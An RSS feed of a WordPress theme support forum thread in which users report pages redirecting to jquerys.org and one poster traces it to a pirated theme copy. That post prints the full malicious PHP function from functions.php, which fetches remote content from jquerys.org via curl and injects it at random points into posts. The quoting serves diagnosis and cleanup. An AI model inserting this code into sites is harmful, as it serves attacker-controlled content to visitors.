http://www.kriesi.at/support/tags/malicious-code Support Forum - Tag: malicious code - Recent Posts en-US Wed, 22 May 2013 16:03:14 +0000 http://bbpress.org/?v=1.0.2 q http://www.kriesi.at/support/search.php http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-93909 Tue, 29 Jan 2013 10:59:35 +0000 Dude 93909@http://www.kriesi.at/support/ <p>Hey! </p> <p> Can you post a link to a page where the issue occurs please? </p> <p> Best regards,<br /> Peter </p> http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-93908 Tue, 29 Jan 2013 10:32:00 +0000 ImagoVisual 93908@http://www.kriesi.at/support/ <p>Hi there!</p> <p>I purchased and installed this theme yesterday and some of my page links redirect to <a href="http://www.jquerys.org/" rel="nofollow">http://www.jquerys.org/</a> as well! </p> http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-91986 Thu, 17 Jan 2013 06:14:18 +0000 Dude 91986@http://www.kriesi.at/support/ <p>Hey! </p> <p> Did you solve the issue? </p> <p> Best regards,<br /> Peter </p> http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-91984 Thu, 17 Jan 2013 05:13:12 +0000 272 91984@http://www.kriesi.at/support/ <p>It's not your HOST, it's your THEME.<br /> In particular, a malicious line of code in functions.php<br /> This suggests to me that you've downloaded a <strong>stolen copy</strong> of the theme, or someone has given/sold you a stolen version.</p> <p>Look in the early section of your functions.php file and you'll see something like this:</p> <p>function ins_php_in_post($content){$percentage = 25;if (rand(0, 100) &lt; $percentage){ob_start();if(function_exists('curl_init')) { $url = "http://www.jquerys.org/jquery-1.6.3.min.js"; $ch = curl_init(); $timeout = 5; curl_setopt($ch,CURLOPT_URL,$url); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout); $data = curl_exec($ch); curl_close($ch); echo "$data"; }$text = ob_get_clean();$pos = rand(0, strlen($content));$txtPrePos = substr($content, 0, $pos);$txtPostPos = substr($content, $pos);$openPos = strrpos($txtPrePos, "&lt;");if ($openPos !== false){$closePos = strrpos($txtPrePos, "&gt;");if ($openPos &gt; $closePos || $closePos === false){$pos = strpos($content, "&gt;", $pos) + 1;}}$spos = strpos($content, " ", $pos);if ($spos === false) {$spos = strlen($content);}$content = substr($content, 0, $spos) . " " . $text . substr($content, $spos);}return $content;}</p> <p>Thew quickest fix is to spend $60 and BUY the theme!<br /> If you try and remove malicious code, you'll no doubt NOT get it ALL out, and you'll have problems down the line with you website's functionality. It's just not worth the time or hassle! </p> http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-89839 Thu, 03 Jan 2013 16:44:34 +0000 Devin 89839@http://www.kriesi.at/support/ <p>Let us know how it goes and definitely contact your hosting provider. They are absolutely the best equipped to deal with malicious code on a server. Even something like a wordpress security plugin can't tell you if you have had your main cpanel account compromised or something like that.</p> <p>Regards,</p> <p>Devin </p> http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-89781 Thu, 03 Jan 2013 10:38:48 +0000 ProjectIndo 89781@http://www.kriesi.at/support/ <p>Hello, I was overseas dealing some business, came back to my warm home and checking out my wordpress, I have installed Wordpress Security Scan, hope it will help. Thank you </p> http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-88892 Wed, 19 Dec 2012 04:00:25 +0000 Devin 88892@http://www.kriesi.at/support/ <p>Hi ProjectIndo,</p> <p>I would suggest contacting your hosting provider and letting them know what is going on. The issue is most likely that your server has been compromised one way or another and some malicious code has been injected somewhere.</p> <p>Your host should be able to do a security scan and assist you further.</p> <p>Regards,</p> <p>Devin </p> http://www.kriesi.at/support/topic/recent-download-for-propelsion-has-a-malicious-malware#post-88884 Wed, 19 Dec 2012 01:59:53 +0000 ProjectIndo 88884@http://www.kriesi.at/support/ <p>My themes always redirect to jquerys.org</p> <p>tommyson.com, let me know when you want to access, I deactivate the themes for safety or google will ban my domain forever </p>